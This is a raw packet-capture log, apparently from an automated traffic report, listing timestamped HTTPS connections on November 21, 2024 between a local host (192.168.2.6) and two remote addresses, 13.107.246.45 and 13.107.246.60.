                                                                                                                                                                        Nov 21, 2024 10:38:06.775182009 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.775186062 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.801090956 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.801119089 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.801166058 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.801177025 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.801212072 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.801232100 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.818372965 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.818401098 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.818439960 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.818459034 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.818480015 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.818495035 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.838787079 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.838812113 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.838869095 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.838887930 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.838918924 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.838968039 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.904419899 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.904459000 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.904582024 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.904872894 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.904885054 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.962321997 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.962347984 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.962399006 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.962426901 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.962441921 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.962466955 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.978818893 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.978843927 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.978905916 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.978912115 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.978965044 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.978965044 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.992619991 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.992645979 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.992682934 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.992688894 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.992723942 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.992742062 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.008604050 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.008632898 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.008680105 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.008687973 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.008733034 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.008748055 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.024674892 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.024701118 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.024744034 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.024750948 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.024777889 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.024790049 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.035032034 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.035070896 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.035123110 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.035131931 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.035166025 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.035562992 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.035583019 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.089492083 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.089939117 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.089967012 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.090519905 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.090524912 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.228019953 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.231247902 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.231353045 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.248136997 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.248157978 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.252188921 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.252230883 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.252306938 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.252522945 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.252532959 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.289460897 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.289505005 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.289573908 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.289844990 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:07.289860010 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.462129116 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.509994030 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.537470102 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.540958881 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.541003942 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.541083097 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.602200031 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.602210045 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.602727890 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.602732897 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.602951050 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.602951050 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.602987051 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.602999926 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.615618944 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.615650892 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.615716934 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.615888119 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.615899086 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.629219055 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.629973888 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.630012035 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.630865097 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.630872011 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.942167997 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.945254087 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.945310116 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.945379972 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.945394993 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.945410013 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.945415020 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.947973013 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.948000908 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:07.948123932 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.948268890 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:07.948277950 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.063028097 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.066334009 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.066407919 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.066824913 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.066842079 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.070400953 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.070446968 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.070615053 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.070748091 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.070763111 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.243192911 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.243849039 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.243870020 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.244287968 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.244296074 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.630462885 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.630759954 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:08.630770922 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.631783009 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.632055998 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:08.632143021 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:08.632204056 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.632291079 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:08.674170971 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:08.674180984 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.696274996 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.699721098 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.699783087 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.699819088 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.699841022 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.699852943 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.699862003 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.702343941 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.702380896 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.702439070 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.702567101 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:08.702577114 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:08.720155954 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.165514946 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165532112 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165545940 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165575027 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165597916 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165597916 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.165617943 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165627003 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.165636063 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.165636063 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.165672064 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.165672064 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.168898106 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.169152021 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.169178009 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.170828104 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.170883894 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.171353102 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.171439886 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.171504021 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.171515942 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.171679974 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.172908068 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.172941923 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.173702002 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.173713923 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.221441031 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.325076103 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.325098038 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.325134993 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.325155973 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.325169086 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.325257063 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.409070969 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.409138918 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.409209013 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.409209013 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.409219027 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.409265041 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.409271002 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.422296047 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.422360897 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.422374010 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.422410965 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.422463894 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.422544003 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.422894955 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.422907114 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.598129034 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.624298096 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.627329111 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.627379894 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.627382040 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.627424002 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.630543947 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.630563974 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.631766081 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.631771088 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.633284092 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.633297920 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.633310080 CET49865443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.633315086 CET4434986513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.644121885 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.644151926 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.644311905 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.650466919 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.650496006 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.678944111 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.679392099 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.679419994 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.679851055 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.679857016 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730052948 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730072021 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730125904 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730124950 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.730139971 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730165958 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730174065 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.730187893 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.730214119 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.861197948 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.864654064 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.864681959 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.865740061 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:09.865746975 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.908025026 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.908049107 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.908256054 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.908268929 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.908320904 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.940960884 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.940984964 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.941102982 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:09.941129923 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:09.941180944 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.053252935 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.053327084 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.053459883 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.087883949 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.087883949 CET49867443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.087909937 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.087919950 CET4434986713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.104700089 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.104732990 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.104777098 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.104789019 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.104829073 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.113611937 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.116622925 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.116712093 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.134227037 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.134249926 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.134330034 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.134342909 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.134386063 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.150755882 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.150769949 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.150780916 CET49868443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.150785923 CET4434986813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.154885054 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.154906034 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.154949903 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.154967070 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.154995918 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.155009985 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.171336889 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.171355963 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.171401978 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.171416044 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.171437025 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.171457052 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.203964949 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.204009056 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.204083920 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.204653978 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.204667091 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.206160069 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.206204891 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.206469059 CET49883443192.168.2.613.107.246.60
